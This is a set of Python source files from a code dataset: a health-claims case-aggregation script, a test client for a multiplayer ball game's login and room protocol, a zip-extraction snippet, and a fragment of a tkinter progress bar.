return({'Var{}'.format(i+1):[x[i] for x in product] for i in range(len(itrs))})\n\ndef loop_over_agg_types(df, cause_type, map_version, prod=True):\n # now loop over every possible way to sum up cases\n agg_types = ['inp_pri', 'inp_any']\n\n # counter to determine to merge or append\n loop_counter = 1\n\n for agg_type in agg_types:\n print(\"beginning {} individual calculations\".format(agg_type))\n # drop DX depending on inp/otp/primary/any\n if agg_type == 'inp_pri':\n # drop all non inpatient primary data\n dat_indv = df[(df.diagnosis_id == 1)].copy()\n dat_claims = df[(df.diagnosis_id == 1)].copy()\n if agg_type == 'inp_any':\n # source is inp only so keep everything\n dat_indv = df.copy()\n dat_claims = df.copy()\n\n # if the subset dataframe is empty move on to next set\n if dat_indv.shape[0] == 0:\n continue\n\n # we also want to go from claims data to estimates for individuals\n prev = dat_indv[dat_indv['{}_measure'.format(cause_type)] == 'prev'].copy()\n # drop all the duplicates for prev causes, equivalent to a 365 day duration\n prev.drop_duplicates(subset=['patient_id', cause_type + '_id'], inplace=True)\n\n inc = dat_indv[dat_indv['{}_measure'.format(cause_type)] == 'inc'].copy()\n\n # create incidence estimates\n final_inc = []\n if inc.shape[0] > 0:\n inc = clinical_mapping.apply_durations(inc, map_version=map_version, cause_type=cause_type, prod=prod, fill_missing=False)\n\n # compare pd concat to appending a list\n start = time.time()\n\n ##### ATTEMPTS TO SPEED THINGS UP#######\n # drop all combinations of patient ID and nfc that occur on same day\n inc.drop_duplicates(subset=['patient_id', 'adm_date',\n 
cause_type + '_id'], inplace=True)\n\n # if an enrollee ID is only present once in this dataframe then that's\n # it, there's just one individual. No need to pass these rows to our\n # recursive function\n r = inc.groupby('patient_id').size().reset_index()\n l = inc.groupby('patient_id')[cause_type + '_id'].nunique().reset_index()\n m = l.merge(r, how='outer', on='patient_id')\n id_array = m.loc[m[cause_type + '_id'] == m[0], 'patient_id']\n inc_indv = inc[inc.patient_id.isin(id_array)].copy()\n \n del r, l, m\n\n final_inc.append(inc_indv)\n # remove these IDs from the object that goes to recursive_duration\n inc = inc[~inc.patient_id.isin(id_array)].copy()\n assert (inc.patient_id.value_counts() > 1).all(),\\\n \"There are enrollee IDs with fewer than 2 value counts\"\n\n inc.sort_values(by=['patient_id', cause_type + '_id', 'adm_date'], inplace=True)\n\n inc = inc.groupby(['patient_id', cause_type + '_id'])\n \n counter = 0\n for patient_id, cause_df in inc:\n counter += 1\n if counter % 15000 == 0:\n print(\"{} Still going...\".format(round((time.time() - start)/60, 2)))\n final_inc.append(mei.recursive_duration(cause_df, pd.DataFrame(), 0, 0))\n print(\"{} done in {} min\".format(agg_type, (time.time()-start)/60))\n\n # bring the data back together\n if len(final_inc) > 0:\n inc_df = pd.concat(final_inc)\n dat_indv = pd.concat([inc_df, prev], sort=False)\n # actually I think these are just called icg durations b/c they're defined at the icg level and then expanded\n # somewhat artificially to bundle\n drop_cols = [col for col in ['adm_limit', '{}_duration'.format(cause_type)] if col in dat_indv.columns]\n dat_indv.drop(labels=drop_cols, axis=1, inplace=True)\n else:\n dat_indv = prev.copy()\n\n # null rows are lost in the groupby so these max cols are used\n # to make sure we're not losing any extra data beyond these nulls\n indv_loss = dat_indv.isnull().sum().max()\n claims_loss = dat_claims.isnull().sum().max()\n print(\"the most null claims from any columns {}\".format(claims_loss))\n indv_sum = dat_indv.shape[0] - indv_loss\n claims_sum = dat_claims.shape[0] - claims_loss\n\n # now create cases\n col_name_a = agg_type + \"_claims_cases\"\n dat_claims[col_name_a] = 1\n\n col_name_i = agg_type + \"_indv_cases\"\n dat_indv[col_name_i] = 1\n\n print(\"Review the null values, ideally there would be zero in all columns\",\n dat_claims.isnull().sum())\n print(\"Review the null values, ideally there would be zero in all columns\",\n dat_indv.isnull().sum())\n # groupby and collapse summing cases\n groups = ['location_id', 'year_start', 'year_end',\n 'age', 'sex_id', cause_type + '_id']\n # add these assertions because pandas groupby is very aggressive with\n # dropping NAs. 
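The assertions that follow guard against a pandas behavior that is easy to miss: groupby silently drops rows whose group key is NaN. A self-contained illustration:

import numpy as np
import pandas as pd

demo = pd.DataFrame({'loc': [1, 1, np.nan], 'cases': [1, 1, 1]})
# the NaN-keyed row vanishes from the aggregation: the total is 2, not 3
print(demo.groupby('loc')['cases'].sum())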
set a 20% data loss threshold\n if dat_indv.shape[0] > 2000:\n assert (dat_indv[groups].isnull().sum() < dat_indv.shape[0] * .2).all()\n assert (dat_claims[groups].isnull().sum() < dat_claims.shape[0] * .2).all()\n\n # perform the groupby\n dat_claims = dat_claims.groupby(groups).agg({col_name_a: 'sum'}).reset_index()\n dat_indv = dat_indv.groupby(groups).agg({col_name_i: 'sum'}).reset_index()\n\n if loop_counter == 1:\n print(\"Creating template df from the dat_claims object\")\n template_df = dat_claims\n loop_counter += 1 # set to 2, won't overwrite on next loop\n else:\n print(\"Merging dat claims object onto template df b/c it already exists\")\n # merge onto our template df created above\n template_df = template_df.merge(dat_claims, how='outer', on = ['age', 'sex_id',\n 'location_id', 'year_start',\n 'year_end', cause_type + '_id'])\n\n template_df = template_df.merge(dat_indv, how='outer', on = ['age', 'sex_id',\n 'location_id', 'year_start',\n 'year_end', cause_type + '_id'])\n\n # check sum of cases to ensure we're not losing beyond what's expected\n assert template_df[col_name_a].sum() == claims_sum,\\\n \"Some cases lost. claims sum is {} type is {} data col sum is {}\".\\\n format(claims_sum, col_name_a, template_df[col_name_a].sum())\n assert template_df[col_name_i].sum() == indv_sum,\\\n \"Some cases lost. individual sum {} {} sum {}\".\\\n format(indv_sum, col_name_i, template_df[col_name_i].sum())\n\n # remove rows where every value is NA\n case_cols = template_df.columns[template_df.columns.str.endswith(\"_cases\")]\n col_sums = template_df[case_cols].sum()\n template_df.dropna(axis=0, how='all', subset=case_cols,\n inplace=True)\n assert (col_sums == template_df[case_cols].sum()).all()\n\n return template_df\n\ndef main(df, map_version='current', cause_type='icg'):\n \"\"\"\n run all the functions defined in this script to go from inpatient admissions\n to inpatient individuals\n \"\"\"\n df = clean_bad_ids(df)\n\n if df.shape[0] == 0:\n pass\n else:\n df = clinical_mapping.map_to_gbd_cause(df, input_type='cause_code',\n output_type=cause_type,\n write_unmapped=False,\n truncate_cause_codes=True,\n extract_pri_dx=True,\n prod=True, map_version=map_version,\n groupby_output=False)\n\n df = loop_over_agg_types(df, map_version=map_version, cause_type=cause_type)\n\n return df\n","sub_path":"gbd_2019/nonfatal_code/clinical_team/Corrections/correction_inputs/estimate_indv.py","file_name":"estimate_indv.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"251273986","text":"# -*- coding:utf8 -*-\nimport urllib.request\nfrom socket import *\nfrom frame_mgr import *\nimport threading\nimport mainwindow\nimport proto.message\nimport proto.myprint\nimport proto.player_info\nimport proto.top_info\nimport proto.player_ball_info\nimport proto.ball_info\nimport proto.player_animal_info\nimport proto.player_pb2\nimport proto.wilds_pb2\nimport math\nimport time\nimport random\nimport matchtime\nimport copy\nimport gamesync.follow\nimport gamesync.follow_ori\nimport gamesync.follow_physics\nimport gamesync.mope\nimport wx\nimport socket_mgr\nimport res\nimport gateway\nimport log\n\nprint=log.log\n\nBUFSIZ = 128 * 1024\n\n\nclass User():\n def __init__(self, sockindex, args, cfg):\n self.sockindex = sockindex\n self.args = args\n self.cfg = cfg\n self.addr = self.cfg[\"addr\"]\n self.port = self.cfg[\"port\"]\n self.ver = self.cfg[\"ver\"]\n \n # self.scene_id = 0\n self.scene_id = 
self.cfg[\"room\"][\"scene\"]\n self.room_type = 0\n self.usedelay = self.cfg[\"room\"][\"usedelay\"]\n self.delaymin = self.cfg[\"room\"][\"delaymin\"]\n self.delaymax = self.cfg[\"room\"][\"delaymax\"]\n self.kcp_enable = self.cfg[\"room\"][\"kcp_enable\"]\n self.udp_enable = self.cfg[\"room\"][\"udp_enable\"]\n self.mouseMove = self.cfg[\"room\"][\"mouse_move\"]\n self.cookie = \"\"\n self.account_name = \"\"\n self.id = 0\n self.ball_id = 0\n \n self.face = 0\n self.old_face = 0\n self.old_power = 0\n self.old_way = 0\n \n self.framemgr = FrameMgr()\n \n self.room_server_addr = \"\"\n self.room_server_key = \"\"\n self.client = None\n self.client_thread = None\n self.terminate = False\n self.player_name = \"\"\n self.players = {} # need lock\n self.playerballs = {} # need lock\n self.balls = {} # need lock\n self.balls_bg = {} # need lock\n self.top = None # need lock\n self.no_find_ball = {} # need lock\n self.mutex = threading.Lock()\n self.room_end_time = 0\n self.res = None\n\n self.udpclient = None\n self.udp_pack_size = None\n \n \n self.left_data_tcp = b\"\"\n self.left_data_udp = b\"\"\n self.pystress = False\n \n \n self.sync_delta = 0.0\n self.drag_back = 0\n self.max_dis = 0\n self.lastSyncTime = 0\n self.thisSyncTime = 0\n\n self.scenemsg_list = []\n self.udpsenemsg_list = []\n\n self.team_rank_list = None\n self.team_info = None\n\n self.cur_match_time = None\n self.next_match_time = None\n\n self.is_live = True\n\n if self.cfg[\"room\"][\"synctype\"] == 1:\n self.gameSync = gamesync.follow_ori.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 2:\n self.gameSync = gamesync.follow.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 3:\n self.gameSync = gamesync.follow_physics.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 4:\n self.gameSync = gamesync.mope.FollowSync()\n \n self.cmds = {}\n self.init_cmds()\n \n \n def init_cmds(self):\n self.cmds[proto.message.Wilds.Login.value] = self.on_wilds_login\n self.cmds[proto.message.Wilds.Top.value] = self.on_wilds_top\n self.cmds[proto.message.Wilds.AddPlayer.value] = self.on_wilds_add_player\n self.cmds[proto.message.Wilds.RemovePlayer.value] = self.on_wilds_remove_player\n self.cmds[proto.message.Wilds.Death.value] = self.on_wilds_death\n self.cmds[proto.message.Wilds.EndRoom.value] = self.on_end_room\n self.cmds[proto.message.Wilds.RefreshPlayer.value] = self.on_wilds_refresh_player\n self.cmds[proto.message.Wilds.SceneChat.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.ActCloseSocket.value] = self.on_exit_room\n self.cmds[proto.message.Wilds.VoiceInfo.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.CastSkill.value] = self.on_cast_skill\n self.cmds[proto.message.Wilds.HeartBeat.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.AsyncPlayerAnimal.value] = self.on_sync_player_animal\n self.cmds[proto.message.Wilds.UpdateTeamInfo.value] = self.on_update_team_info\n self.cmds[proto.message.Wilds.TeamRankList.value] = self.on_team_ranking_list\n self.cmds[proto.message.Wilds.ReLife.value] = self.on_relife\n self.cmds[proto.message.Wilds.SceneTCP.value] = self.on_wilds_scene_tcp\n if self.usedelay > 0:\n self.cmds[proto.message.Wilds.SceneUDP.value] = self.on_delay_udp_scene\n else:\n self.cmds[proto.message.Wilds.SceneUDP.value] = self.on_wilds_scene_udp\n \n def login(self):\n account = self.cfg[\"login\"][\"account\"]\n password = self.cfg[\"login\"][\"password\"]\n dev = self.cfg[\"login\"][\"dev\"]\n device = self.cfg[\"login\"][\"device\"]\n r = 
self.cfg[\"login\"][\"r\"]\n m = self.cfg[\"login\"][\"m\"]\n return self.login_detail(account, password, dev, device, r, m)\n \n def login_detail(self, account, password, dev, device, r, m):\n try:\n #like: http://127.0.0.1:8080/msg?c=1&a=BOS30000022&p=&ver=1.2.0&dev=4730d114e32c13359a112ce6cc17eebbd2073944&device=android&r=1&m=0&sign=7e343d61e73ecd3c600521ae9588c460\n \n c = proto.message.Player.Login.value\n sign = proto.message.get_sign(c)\n url = \"http://%s:%d/msg?c=%d&a=%s&p=%s&ver=%s&dev=%s&device=%s&r=%d&m=%d&sign=%s\" % (self.addr, self.port, c, account, password, self.ver, dev, device, r, m, sign)\n print(\"url=\", url)\n \n request = urllib.request.urlopen(url)\n result = request.read()\n \n self.cookie = request.getheader(\"Set-Cookie\")\n if self.cookie != \"\":\n self.cookie = self.cookie[self.cookie.find(\"=\")+1: self.cookie.find(\";\")]\n \n cmd, msg = proto.message.unpack(result)\n pmsg = proto.player_pb2.RetLoginMsg()\n pmsg.ParseFromString(msg)\n proto.myprint.print_login_result(pmsg)\n \n self.account_name = pmsg.Account\n self.id = pmsg.Id\n \n if pmsg.Id == 0:\n print(\"connect login server fail.\")\n return False\n \n # TODO: 暂时屏蔽登录gateway\n '''\n if self.pystress == False:\n if gateway.gate.login_gateway(self) == False:\n print(\"connect gateway server fail.\")\n return False\n '''\n \n except Exception as e:\n print(e)\n return False\n \n return True\n \n \n def req_room(self):\n \n if self.cookie == \"\":\n return False\n \n #like: http://127.0.0.1:8080/msg?c=3&ver=1.2.0&ticketnum=0&scene=1002&sign=tolower(md5(SIGNKEYc))\n \n c = proto.message.Player.ReqIntoFRoom.value\n sign = proto.message.get_sign(c)\n self.scene_id = scene = self.cfg[\"room\"][\"scene\"]\n url = \"http://%s:%d/msg?c=%d&ver=%s&ticketnum=%d&scene=%d&sign=%s\" % (self.addr, self.port, c, self.ver, 0, scene, sign)\n print(\"url=\", url)\n \n request = urllib.request.Request(url, headers={\"Cookie\":\"session=\"+self.cookie})\n result = urllib.request.urlopen(request).read()\n cmd, msg = proto.message.unpack(result)\n pmsg = proto.player_pb2.RetIntoFRoom()\n pmsg.ParseFromString(msg)\n proto.myprint.print_room_result(pmsg)\n \n if pmsg.Err == 0:\n self.room_server_addr = pmsg.Addr\n self.room_server_key = pmsg.Key\n \n return pmsg.Err == 0\n \n \n def connect_room_server(self):\n if self.room_server_addr == \"\" or self.room_server_key == \"\":\n print('self.room_server_addr == \"\" or or self.room_server_key == \"\"')\n return False\n \n host = self.room_server_addr[:self.room_server_addr.find(\":\")]\n port = int(self.room_server_addr[self.room_server_addr.find(\":\") + 1:])\n addr = (host, port)\n \n if self.client != None:\n socket_mgr.get_socket_set(\"tcp\").remove_sock(self.sockindex)\n self.client.close()\n self.client = None\n self.client = socket_mgr.get_socket_set(\"tcp\").add_sock(self.sockindex, SOCK_STREAM)\n \n try:\n self.client.connect(addr)\n except Exception as e:\n print(e)\n return False\n \n if self.udp_enable!=0:\n if self.udpclient != None:\n socket_mgr.get_socket_set(\"udp\").remove_sock(self.sockindex)\n self.udpclient.close()\n self.udpclient = None\n self.udpclient = socket_mgr.get_socket_set(\"udp\").add_sock(self.sockindex, SOCK_DGRAM)\n self.udpclient.connect(addr)\n\n return True\n \n \n def start_game(self):\n if self.client == None:\n print(\"restart ...\")\n self.terminate = False\n self.req_room()\n if self.connect_room_server() == False:\n return False\n time.sleep(0.02)\n \n print(\"call start_game #1\")\n \n pmsg = proto.wilds_pb2.MsgLogin()\n pmsg.name = 
\"%s_%d\" % (self.account_name, self.id)\n pmsg.key = self.room_server_key\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Login.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n ##todo:对时\n #self.match_time()\n \n print(\"call start_game #2\")\n \n #加载资源\n if self.pystress==False:\n self.res = res.new(self.args, self.cfg, self.scene_id)\n print(\"call start_game #3\")\n \n return True\n \n def move(self, angle, power):\n if self.face == self.old_face and self.old_power == power and self.old_way == angle:\n return\n self.old_face = self.face\n self.old_power = power\n self.old_way = angle\n \n pmsg = proto.wilds_pb2.MsgMove()\n pmsg.angle = angle\n pmsg.power = power\n pmsg.face = self.face\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Move.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def run(self):\n pmsg = proto.wilds_pb2.MsgRun()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Run.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def relife(self):\n pmsg = proto.wilds_pb2.MsgRelife()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.ReLife.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def bindTCPSession(self):\n pmsg = proto.wilds_pb2.MsgBindTCPSession()\n pmsg.id = self.id\n pmsg.key = self.room_server_key\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.BindTCPSession.value\n msg = proto.message.pack(cmd, data)\n if self.client == None:\n return\n if self.udp_enable > 0 and self.udpclient != None:\n self.udpclient.sendall(msg)\n\n\n def cast_skill(self, skillId):\n pmsg = proto.wilds_pb2.MsgCastSkill()\n pmsg.skillid = skillId\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.CastSkill.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n \n def heart_beat(self):\n cmd = proto.message.Wilds.HeartBeat.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n \n def exit_room(self):\n cmd = proto.message.Wilds.ActCloseSocket.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n\n def on_cast_skill(self, data):\n pass\n \n def on_sync_player_animal(self, data):\n pmsg = proto.wilds_pb2.MsgAsyncPlayerAnimal()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n if pmsg.id in self.players:\n player = self.players[pmsg.id]\n if player.ballId in self.playerballs:\n ball = self.playerballs[player.ballId]\n ball.level = pmsg.animalid\n self.mutex.release()\n \n \n def get_ball(self):\n self.mutex.acquire()\n ball = None\n if self.ball_id in self.playerballs:\n ball = self.playerballs[self.ball_id]\n self.mutex.release()\n return ball\n \n def on_recv(self, data, udp_channel=0):\n msgs = proto.message.on_recv(self, data, udp_channel)\n if len(msgs) == 0:\n return\n\n for (cmd, data) in msgs:\n self.on_recv_one(cmd, data, udp_channel)\n \n def on_recv_one(self, cmd, data, udp_channel=0):\n if cmd in self.cmds:\n self.cmds[cmd](data)\n else:\n print(\"cmd = \", cmd)\n if udp_channel != 0:\n self.udp_pack_size = len(data)\n\n \n def on_wilds_login(self, data):\n print(\"on_wilds_login\")\n pmsg = proto.wilds_pb2.MsgLoginResult()\n pmsg.ParseFromString(data)\n proto.myprint.print_wilds_login_result(pmsg)\n \n if pmsg.ok:\n self.player_name = pmsg.name\n self.ball_id = pmsg.ballId\n 
self.framemgr.set_frame(pmsg.frame)\n print(\"lefttime:\", pmsg.leftTime)\n self.room_end_time = pmsg.leftTime + round(time.time())\n \n self.mutex.acquire()\n \n for p in pmsg.others:\n player = proto.player_info.PlayerInfo(p)\n self.players[player.id] = player\n \n for pb in pmsg.playerballs:\n playerball = proto.player_ball_info.PlayerBallInfo(pb)\n self.playerballs[playerball.id] = playerball\n #print( \"add playerball =====================\" )\n #print( playerball.id )\n \n for b in pmsg.balls:\n ball = proto.ball_info.BallInfo(b)\n self.balls[ball.id] = ball\n \n if self.pystress==False:\n t = self.res.food[ball.type][\"type\"]\n if t == proto.wilds_pb2.FoodHammer or t == proto.wilds_pb2.FoodBomb:\n self.balls_bg[ball.id] = ball\n \n self.mutex.release()\n \n \n '''\n # select an animal\n if pmsg.IsFirstCross == False:\n pmsg = proto.wilds_pb2.MsgSelectAnimal()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.SelectAnimal.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n '''\n \n\n # bind the TCP session\n if self.kcp_enable > 0 or self.udp_enable > 0:\n self.bindTCPSession()\n \n if self.pystress==False:\n mainwindow.open_room_window(self)\n \n else:\n print(\"start game fail\")\n \n def on_wilds_top(self, data):\n pmsg = proto.wilds_pb2.MsgTop()\n pmsg.ParseFromString(data)\n self.mutex.acquire()\n self.top = proto.top_info.TopInfo(pmsg)\n self.mutex.release()\n \n def on_wilds_add_player(self, data):\n pmsg = proto.wilds_pb2.MsgAddPlayer()\n pmsg.ParseFromString(data)\n player = proto.player_info.PlayerInfo(pmsg.player)\n \n self.mutex.acquire()\n self.players[player.id] = player\n self.mutex.release()\n \n def on_wilds_remove_player(self, data):\n pmsg = proto.wilds_pb2.MsgRemovePlayer()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n if pmsg.id in self.players:\n player = self.players[pmsg.id]\n if player.ballId in self.playerballs:\n self.playerballs.pop(player.ballId)\n self.players.pop(pmsg.id)\n self.mutex.release()\n\n\n def on_delay_scene(self, data):\n self.mutex.acquire()\n self.scenemsg_list.append((int(round(time.time() * 1000)), data)) \n self.mutex.release()\n\n def on_delay_udp_scene(self, data):\n self.mutex.acquire()\n self.udpsenemsg_list.append((int(round(time.time() * 1000)), data))\n self.mutex.release()\n\n def sync_udpscene(self):\n if len(self.udpsenemsg_list) == 0:\n return\n (t, data) = self.udpsenemsg_list[0]\n Now = int(round(time.time() * 1000))\n delay = random.uniform(self.delaymin, self.delaymax)\n if Now - t >= delay:\n self.on_wilds_scene_udp(data)\n self.udpsenemsg_list.pop(0)\n\n def on_wilds_scene_tcp(self, data):\n pmsg = proto.wilds_pb2.MsgSceneTCP()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n for bid in pmsg.removes:\n if bid in self.balls:\n self.balls.pop(bid)\n for b in pmsg.adds:\n ball = proto.ball_info.BallInfo(b)\n \n if ball.id in self.balls:\n if self.pystress==False:\n print(\"add ball, but ball already exist!!!!! 
ball_id =\", ball.id, \"ball_type =\", self.res.food[ball.type][\"type\"])\n \n self.balls[ball.id] = ball\n if self.pystress==False:\n t = self.res.food[ball.type][\"type\"]\n if t == proto.wilds_pb2.FoodHammer or t == proto.wilds_pb2.FoodBomb:\n self.balls_bg[ball.id] = ball\n \n if ball.id in self.no_find_ball:\n self.no_find_ball.pop(ball.id)\n \n for pbid in pmsg.removePlayers:\n #print( \"remove playerball ===================== #2\" )\n if pbid in self.playerballs:\n self.playerballs.pop(pbid)\n #print( \"remove playerball ===================== #1\" )\n #print( pbid )\n for pb in pmsg.addPlayers:\n playerball = proto.player_ball_info.PlayerBallInfo(pb)\n \n if playerball.id in self.playerballs:\n print(\"add player ball, but player ball already exist!!!!! ball_id =\", playerball.id)\n \n self.playerballs[playerball.id] = playerball\n #print( \"add playerball =====================\" )\n #print( playerball.id )\n \n if playerball.id in self.no_find_ball:\n self.no_find_ball.pop(playerball.id)\n \n playerball.server_pre_x = playerball.x\n playerball.server_pre_y = playerball.y\n playerball.client_pre_x = playerball.x\n playerball.client_pre_y = playerball.y\n playerball.server_now_x = playerball.x\n playerball.server_now_y = playerball.y\n playerball.client_now_x = playerball.x\n playerball.client_now_y = playerball.y\n \n for e in pmsg.eats:\n if e.target in self.balls:\n #print (self.balls[e.target], e.target)\n self.balls.pop(e.target)\n\n for hit in pmsg.hits:\n if hit.target in self.playerballs:\n ball = self.playerballs[hit.target]\n ball.hp = hit.curHp\n self.mutex.release()\n\n def on_wilds_scene_udp(self, data):\n pmsg = proto.wilds_pb2.MsgSceneUDP()\n pmsg.ParseFromString(data)\n\n frame = self.framemgr.get_pre_frame()\n if pmsg.frame < frame:\n return\n \n self.framemgr.set_frame(pmsg.frame)\n \n self.mutex.acquire()\n # print(\"bigdevil_ballid \", self.bigdevil_ballid)\n for m in pmsg.moves:\n ball = None\n if m.id in self.playerballs:\n ball = self.playerballs[m.id]\n ball.isplayer = True\n elif m.id in self.balls:\n ball = self.balls[m.id]\n ball.isplayer = False\n else:\n pass\n #print(\"no find ball. 
id = \", m.id)\n \n #self.no_find_ball[m.id] = m\n \n \n if ball != None:\n ball.state = m.state\n ball.angle = m.angle\n ball.face = m.face\n\n ball.server_pre_x = ball.server_now_x\n ball.server_pre_y = ball.server_now_y\n ball.client_pre_x = ball.client_now_x\n ball.client_pre_y = ball.client_now_y\n ball.server_now_x = m.x\n ball.server_now_y = m.y\n ball.client_now_x = ball.x\n ball.client_now_y = ball.y\n \n if (ball.id == self.ball_id and self.is_live == True) or (ball.id != self.ball_id):\n self.gameSync.SyncMove(ball, m, None, self.cur_match_time)\n \n self.mutex.release()\n \n def on_wilds_death(self, data):\n pmsg = proto.wilds_pb2.MsgDeath()\n pmsg.ParseFromString(data)\n \n if pmsg.Id == self.id:\n self.is_live = False\n if self.pystress==False:\n wx.CallAfter(wx.MessageBox, \"你已经挂了,请点击复活按钮,继续战斗!\", \"提示\", wx.OK | wx.ICON_INFORMATION)\n else:\n pass\n \n def on_end_room(self, data):\n if self.pystress==False:\n wx.CallAfter(self.on_end_room_detail)\n \n \n def on_end_room_detail(self):\n if self.pystress==False:\n wx.MessageBox(\"本局游戏结束!\", \"提示\", wx.OK | wx.ICON_INFORMATION)\n self.on_exit_room(None)\n \n def allstop(self):\n for k,v in self.playerballs.items():\n v.vx = 0\n v.vy = 0\n \n def on_wilds_refresh_player(self, data):\n pmsg = proto.wilds_pb2.MsgRefreshPlayer()\n pmsg.ParseFromString(data)\n player = proto.player_info.PlayerInfo(pmsg.player)\n \n self.mutex.acquire()\n self.players[player.id] = player\n\n if player.ballId in self.playerballs:\n ball = self.playerballs[player.ballId]\n ball.hp = player.curhp\n ball.curmp = player.curmp\n ball.curexp = player.curexp\n # print(\"hp:\", player.curhp, \" curmp:\", player.curmp)\n\n self.mutex.release()\n \n def on_exit_room(self, data):\n self.on_exit_room_clear_data()\n if self.pystress==False:\n mainwindow.close_room_window(self)\n \n def on_exit_room_clear_data(self):\n self.mutex.acquire()\n self.players = {}\n self.playerballs = {}\n self.balls = {}\n self.balls_bg = {}\n self.top = None\n self.no_find_ball = {}\n self.mutex.release()\n \n def on_wilds_donothing(self, data):\n pass\n\n def on_hit(self, data):\n pmsg = proto.wilds_pb2.HitMsg()\n pmsg.ParseFromString(data)\n proto.myprint.print_hit_msg(pmsg)\n\n def on_update_team_info(self, data):\n pmsg = proto.wilds_pb2.UpdateTeamInfoMsg()\n pmsg.ParseFromString(data)\n \n self.team_info = []\n for mem in pmsg.members:\n if mem.playerid in self.players:\n player = self.players[mem.playerid]\n self.team_info.append((mem.playerid, mem.x * 100, mem.y * 100, player.ballId))\n else:\n self.team_info.append((mem.playerid, mem.x * 100, mem.y * 100, 0))\n self.team_info.sort(key=lambda a:a[0])\n\n # for mem in pmsg.members:\n # print(\"mem id: \", mem.playerid, \" (\", mem.x, \",\", mem.y, \")\")\n # for mem in pmsg.topPlayers:\n # print(\"top id: \", mem.playerid, \" (\", mem.x, \",\", mem.y, \")\")\n\n def on_team_ranking_list(self, data):\n pmsg = proto.wilds_pb2.RetTeamRankList()\n pmsg.ParseFromString(data)\n self.team_rank_list = pmsg\n # for team in pmsg.Teams:\n # print(\"team name: \", team.Tname, \" num: \", team.Num, \" CorpName: \", team.CorpName, \" score: \", team.Score, \" last rank: \", team.LastRank)\n # print(\"Watch num: \", pmsg.WatchNum, \" EndTime: \", pmsg.EndTime, \" KillNum: \", pmsg.killNum)\n\n def on_relife(self, data):\n pmsg = proto.wilds_pb2.MsgS2CRelife()\n pmsg.ParseFromString(data)\n \n if pmsg.SnapInfo.Id == self.id:\n self.is_live = True\n self.mutex.acquire()\n self.framemgr.set_frame(pmsg.frame)\n self.playerballs = {}\n self.balls 
= {}\n self.balls_bg = {}\n self.mutex.release()\n\n\n def is_same_team(self, ballId):\n if self.team_info == None:\n return False\n else:\n for mem in self.team_info:\n if mem[3] == ballId:\n return True\n return False \n\n\n def match_time(self):\n self.mutex.acquire()\n if self.cur_match_time != None and self.cur_match_time.GetDelay() < 10:\n self.mutex.release()\n return\n if self.next_match_time == None or int(time.time() * 1000) - self.next_match_time.local_send_time >= 1000:\n cmd = proto.message.Wilds.MatchTime.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n if self.next_match_time == None:\n self.next_match_time = matchtime.MatchTime(int(time.time() * 1000))\n else:\n self.next_match_time.local_send_time = int(time.time() * 1000)\n # print(\"\\n\")\n # print(\"`````local_send_time:\", self.next_match_time.local_send_time)\n # print(\"`````server_time:\", self.next_match_time.server_time)\n # print(\"`````local_recv_time:\", self.next_match_time.local_recv_time)\n self.mutex.release()\n \n \n def close(self):\n self.terminate = True\n if self.client != None:\n self.client.close()\n socket_mgr.get_socket_set(\"tcp\").remove_sock(self.sockindex)\n self.client = None\n if gateway.gate.gateClient != None:\n gateway.gate.gateClient.close()\n gateway.gate.gateClient = None\n if self.udpclient != None:\n self.udpclient.close()\n socket_mgr.get_socket_set(\"udp\").remove_sock(self.sockindex)\n self.udpclient = None\n ","sub_path":"server.match/tools/py_guiclient/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":27059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408759659","text":"import zipfile, os\n\ndest_path = os.path.join(os.getcwd(), 'extracted')\n\nmyZip = zipfile.ZipFile('myZip.zip')\n# Extract single file in zip\nmyZip.extract('hello.txt')\n# Extract everything in the zip, to a new directory\nmyZip.extractall(dest_path)\nprint(\"Extracted\")","sub_path":"030-zipfile-extract/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"508824793","text":"\nclass Status:\n def __init__(self, parent=tk.Tk()):\n self.percent_complete = 0\n self.root = parent\n self.root.title(\"Status of your face!\")\n self.root.configure(bg=\"black\")\n self.root.geometry(\"%dx%d+0+0\" % (250, 80))\n self.label = tk.Label(master=self.root, text=\"Working on it, just wait a minute.\", bg=\"black\", fg=\"white\")\n self.label.grid(column=0,row=0, sticky=\"n\")\n self.loadingbar = tk.Canvas(master=self.root)\n self.loadingbar.configure(height=20, width=200, bg=\"black\")\n self.loadingbar.grid(column=0,row=1)\n\n def five_percent(self):\n self.percent_complete += .05\n self.create_box(self.loadingbar, int(self.percent_complete*200))\n\n def create_box(self, canvas, top_left):\n canvas.create_line(top_left, 0, top_left-10, 0, fill=\"white\")\n canvas.create_line(top_left-10, 0, 